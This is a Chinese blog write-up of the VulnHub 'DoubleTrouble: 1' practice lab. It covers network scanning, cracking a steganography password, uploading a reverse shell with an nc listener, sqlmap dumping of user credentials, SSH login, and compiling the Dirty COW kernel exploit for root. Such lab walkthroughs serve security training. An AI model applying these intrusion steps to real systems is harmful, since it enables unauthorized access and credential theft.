DOUBLETROUBLE: 1实战演练

已于 2023-05-25 07:27:10 修改
阅读量747 收藏
点赞数
分类专栏: vulnhub 文章标签: linux git ssh
于 2023-05-24 10:39:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/longlangci/article/details/130841979
版权

文章目录

DOUBLETROUBLE: 1实战演练

一、前期准备
1、相关信息

靶机网站:https://www.vulnhub.com/entry/doubletrouble-1,743/

设备名称IP地址
靶机:DOUBLETROUBLE: 1192.168.0.108
攻击机:kali192.168.0.112
二、信息收集
1、nmap探测目标靶机端口
kali@kali:~$ nmap -A 192.168.0.108

# 开放SSH:22、WEB:80端口

在这里插入图片描述

2、扫描目标网址目录
kali@kali:~$ sudo dirsearch -u "http://192.168.0.108/"

在这里插入图片描述

3、访问网站,发现secret下有个图片
http://192.168.0.108/secret/

在这里插入图片描述

4、将图片下载
kali@kali:~$ http://192.168.0.108/secret/doubletrouble.jpg

在这里插入图片描述

5、查看图片所含内容
kali@kali:~$ steghide --info doubletrouble.jpg

# 发现有密码

在这里插入图片描述

6、破解密码并查看
kali@kali:~$ steghide doubletrouble.jpg rouckyou.txt -xf 密码.txt

# 邮箱:otisrush@localhost.com
# 密码:otis666

在这里插入图片描述

7、登陆邮箱

在这里插入图片描述

8、创建反弹shell

网址:https://www.revshells.com/
在这里插入图片描述

9、上传反弹shell

在这里插入图片描述

10、监听
http://192.168.0.108/uploads/users/

kali@kali:~$ nc -lvnp 9001

在这里插入图片描述

在这里插入图片描述

11、写入交互式shell
$ python -c "import pty;pty.spawn('/bin/bash')"
三、提权
1、查看权限并提权
www-data@doubletrouble:/$ sudo -l

在这里插入图片描述

2、查看文件
root@doubletrouble:~# ls

# 发现一个镜像文件

在这里插入图片描述

3、下载镜像文件
root@doubletrouble:~# python3 -m http.server

http://192.168.0.108:8000

在这里插入图片描述
在这里插入图片描述

4、安装镜像
四、信息收集
1、nmap探测目标靶机端口
kali@kali:~$ nmap -A 192.168.0.109

# 开放SSH:22、WEB:80端口

在这里插入图片描述

2、访问网站
http://192.168.0.109

在这里插入图片描述

3、利用sqlmap注入
kali@kali:~$ sqlmap -u "http://192.168.0.109/" --forms --batch

在这里插入图片描述

4、获取数据库
kali@kali:~$ sqlmap -u "http://192.168.0.109/" --forms --dbs --batch

在这里插入图片描述

5、获取表名
kali@kali:~$ sqlmap -u "http://192.168.0.109/" --forms -D doubletrouble --tables --batch

在这里插入图片描述

6、获取列名
kali@kali:~$ sqlmap -u "http://192.168.0.109/" --forms -D doubletrouble -T users --columns --batch

在这里插入图片描述

7、获取字段值
kali@kali:~$ sqlmap -u "http://192.168.0.109/" --forms -D doubletrouble -T users -C username,password --batch

# 第一个用户
# 用户名:montreux	密码:GfsZxc1
# 第二个用户
# 用户名:clapton	密码:ZubZub99

在这里插入图片描述

8、SSH远程登陆
# 利用获取的账号密码从SSH开放的端口登陆
# 第一个用户名登录
kali@kali:~$ssh montreux@192.168.0.109
# 第二个用户吗登录
kali@kali:~$ssh clapton@192.168.0.109

在这里插入图片描述

五、提权
1、查看文件
clapton@doubletrouble:~$ ls
clapton@doubletrouble:~$ cat user.txt

在这里插入图片描述

2、查看系统信息内核

源码地址:https://github.com/FireFart/dirtycow/blob/master/dirty.c

clapton@doubletrouble:~$ uname -a

# 发现内核版本为3.2.X,有Dirty Cow漏洞

在这里插入图片描述

3、编译源码
# 将源码复制到nano dirty.c中,并创建一个root密码

clapton@doubletrouble:~$ nano dirty.c
clapton@doubletrouble:~$ gcc -pthread dirty.c -o dirty -lcrypt
clapton@doubletrouble:~$./dirty root

# 部分源码,全部源码见上方源码地址
# 用户名:firefart	密码:root

在这里插入图片描述

在这里插入图片描述

4、切换用户并查看文件
clapton@doubletrouble:~$ su firefart
firefart@doubletrouble:/home/clapton# ls
firefart@doubletrouble:/home/clapton# cd
firefart@doubletrouble:~# ls
firefart@doubletrouble:~# cat root.txt

在这里插入图片描述

liebe1*1
关注
专栏目录
【Vulnhub靶场】DOUBLETROUBLE: 1 通关writeup
weixin_44588899的博客
05-20 1094
环境 靶机地址:https://www.vulnhub.com/entry/doubletrouble-1,743/ kali攻击机ip:192.168.220.128 靶机 ip: 靶机地址: 使用命令: arp-scan -l 探测发现是:192.168.220.130 开始探测 nmap -T4 -p- -A 192.168.220.130 发现开放22、80端口, 打开http://192.168.220.130 /,是一个登录框,没什么有价值的东西,直接扫目录吧。 dirb http:
VulnHub doubletrouble
weixin_45682839的博客
10-11 439
涉及知识:端口服务探测、敏感目录收集、WEB信息搜集、框架漏洞利用、利用代码修改、图片隐写破解、linux本地提权、SQL注入等。
doubletrouble1靶场详解
weixin_44681307的博客
07-12 197
把抓到的内容复制到一个空文档中去,用sqlmap跑一下,这里面的内容不能修改,空行也不可以删除,会出错。发现里面是一个图片,下载到我们kali 中去,因为都说了是秘密,所以这个图片肯定有点问题。下载到kali中运行发现需要三个参数,地址,邮箱和密码,我们刚好利用刚才找到的用户名密码。搜索了一下有没有漏洞,结果发现一大堆漏洞,直接内核提权,我下载的是40616.c这个。但是steghide发现里面隐写了东西,因为需要输入密码,所以里面肯定是有东西的。发现有一个登陆页面,用bp抓包看看,发现是post请求。
doubletrouble靶机通关详解
arcuied
08-10 324
doubletrouble靶机通关详解
Vulnhub靶机:doubletrouble
qq_48904485的博客
01-06 1129
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:doubletrouble(10.0.2.7)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/doubletrouble-1,743/
vulnhub之doubletrouble(版本一)
m0_67427205的博客
12-19 117
对扫描的目录逐一进行访问,有很多有意思的东西,但是站在出题者的角度,我觉得这道题最重要的可能是/secret目录,尝试访问,得到了一张图片。在kali中开启监听,点击shell.php运行,即可发送shell至kali,查看自己的权限,并利用python获取交互式shell。然后只需要将其上传即可,刚刚目录扫描中还有一个/uploads目录,访问该目录,点击users即可找到刚才上传的文件。很简陋的表单,尝试用刚才获取的用户名和密码登录失败,该表单如此简陋,不会有sql注入吧,sqlmap简单跑一跑。
doubletrouble靶机打靶过程及思路
qq_52610024的博客
05-10 608
4.searchsploitqdpm9.1发现存在rce漏洞需要登录使用,使用默认密码进行登录,但。9.使用ssh进行登录目标系统账号密码,尝试用第二个账号密码登录ssh时发现成功,先进行万能密码测试’or1=1#失败,查看源码也没有收获,再次进行路径爬取。但是也没有得到有效的信息,使用bp抓包放回包,使用时间盲注得到不一样的注入。执行成功上传了一个后门文件,使用nc反弹shell成功,升级shell后。将数据包保存下来,使用sqlmap进行注入成功,使用得到的账号密码均失败。...
vulnhub靶机-doubletrouble: 1
yc11223344的博客
08-25 801
攻击机:192.168.100.128靶机:192.168.100.130。
【Vulnhub靶场】DOUBLETROUBLE: 1
DG_s1mple
03-14 569
环境准备 把下载好的文件导入到vmware里面 题目里没有给出ip地址,需要我们自己去探测 信息收集 kali使用命令arp-scan命令探测IP地址 靶机IP地址为:192.168.2.18 攻击机IP地址为:192.168.2.16 我们使用namp扫描一下靶机 只开放了ssh跟http 渗透开始 我们首先访问靶机的网站 是一个登录界面,没有什么信息,我们使用dirsearch扫描一下靶机的目录 都访问一下,然后发现secret目录下有一张图片 我们把它下载下载用stegseek爆破查一下是
doubletrouble:html5 w vim快捷方式中的两人游戏
05-26
双重麻烦 带有html5 w / vim快捷键的... 要开始玩,请抓住一个朋友并前往 如果您有兴趣帮助: git clone https://github.com/jonathanballs/doubletrouble.git cd doubletrouble npm install . 启动服务器 node .
doubletrouble靶机
08-29
第二个地址是https://www.vulnhub.com/entry/doubletrouble-1,743/,可以获取更多有关靶机的描述信息。靶机中包含一个名为"doubletrouble"的数据库,其中有一个名为"users"的表。你可以使用sqlmap等工具对该表进行...
【Vulnhub靶场】ICA: 1 通关writeup
weixin_44588899的博客
05-22 1149
文章目录环境准备信息搜集漏洞利用权限提升 环境准备 靶机地址:https://www.vulnhub.com/entry/doubletrouble-1,743/ kali攻击机ip:192.168.220.128 靶机 ip: 靶机地址: 使用命令: arp-scan -l 探测发现是:192.168.220.132 信息搜集 nmap -T4 -p- -A 192.168.220.132 发现开放22、80、3306端口,先打开80端口,发现cms是qdPM9.2版本,在exp-db搜索漏.
vulnhunb之doubletrouble:1
qwweggfe的博客
09-18 1712
由于这个靶机比较简单,所以我就直接写渗透过程了: 首先进行ip扫描 于是打开网页进行查看 发现他是qdPM 9.1搭建,我在网上查找发他有远程文件上传的漏洞,但是我们又没有用户名密码,于是我进行目录扫描 NVD - CVE-2020-7246 gobuster dir -r -u http://192.168.181.166/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html..
Linux编辑/etc/fstab文件不当,不使用快照;进入救援模式
feng68_的博客
11-14 645
如果遇到任何问题,您可能需要进一步的故障排除,比如检查文件系统的完整性或修复文件系统错误。1)当出现以下警告时不要慌,如果文件系统默认挂载为只读模式,将其重新挂载为读写模式就好了,应该是吧。您可以选择1继续,或者选择2以只读模式挂载文件系统,或者选择3跳过直接进入shell。后面加), 把只读模式改成读写模式 ,然后ctrl+x重启。然后会出现一串红色的字,太快了,看不清,然后就重启成功了。如果您在虚拟控制台(VC)1或VC2中,可以使用。获取root权限,这样您就可以编辑。2)挂载根文件系统为读写模式。
Linux】多线程(中)
Eristic0618的博客
11-14 1352
本篇文章围绕Linux中的多线程展开讲解,包含线程互斥的概念、互斥量mutex和相关API、互斥量原理、重入和线程安全、死锁、线程同步和条件变量等内容
Linux】阿里云服务器搭建gradio实例
Explore_Zhou
11-13 1220
因为课程原因,需要做一个大模型相关的大作业,想到之前买的阿里云服务器,便想在服务器基于大模型API部署一个聊天机器人。因为是新手,特地做个记录,供初学者参考。从上面安装的几个软件来看,其实Linux端安装软件还是有规律可循的,主要就是那么几步:configure,make,make installlink1link2。
Linux从入门到精通
最新发布
qq_54384621的博客
11-16 362
Linux的图形化界面并不稳定,因此往往使用命令行去接触Linux操作系统在linux的terminal终端中输入指令ifconfig就可以获取到本机的ip地址了。然后通过finalshell配置好相关的信息连接上就可以直接使用了。拓展:WSL获取轻量化虚拟机WSL全称为windows subsystem for linux可以在windows中获取linux系统环境并完全直连计算机硬件,无需通过虚拟机的虚拟硬件,因此完全可以替换掉vmware打开方式:1右键开始找到应用与功能。
Linux(CentOS 7) yum一键安装mysql8
风兮雨露的博客
11-12 796
输入链接IP、账号root、密码123456,端口号 3306,显示“连接成功”代表流程通了。自此在linux系统上安装mysql8已经完成,并且可以使用图形化界面远程连接。mysql已经可以本地连接上了,但要用图形化界面远程连接,需开放防火墙的3306端口才行。(2)输入密码并且修改密码(密码规则是4种类型字符)登录命令: mysql -u root -p。(2)安装mysql yum 仓库配置文件。(3)先清理缓存(可能以前被操作过)(1)选中mysql数据库。(2)设置允许远程连接并生效。
linux逻辑卷练习
feng68_的博客
11-15 337
从新硬盘制作三个分区每个分区都 3GB大小, 将三个分区只作为物理卷,通过这三个物理卷创建卷组 通过卷组生成一个逻辑卷,大小为7G,再将逻辑卷调整到10G。物理卷(physical volume):简称PV。逻辑卷(logical volume):简称LV。卷组(Volume Group):简称VG。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

liebe1*1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值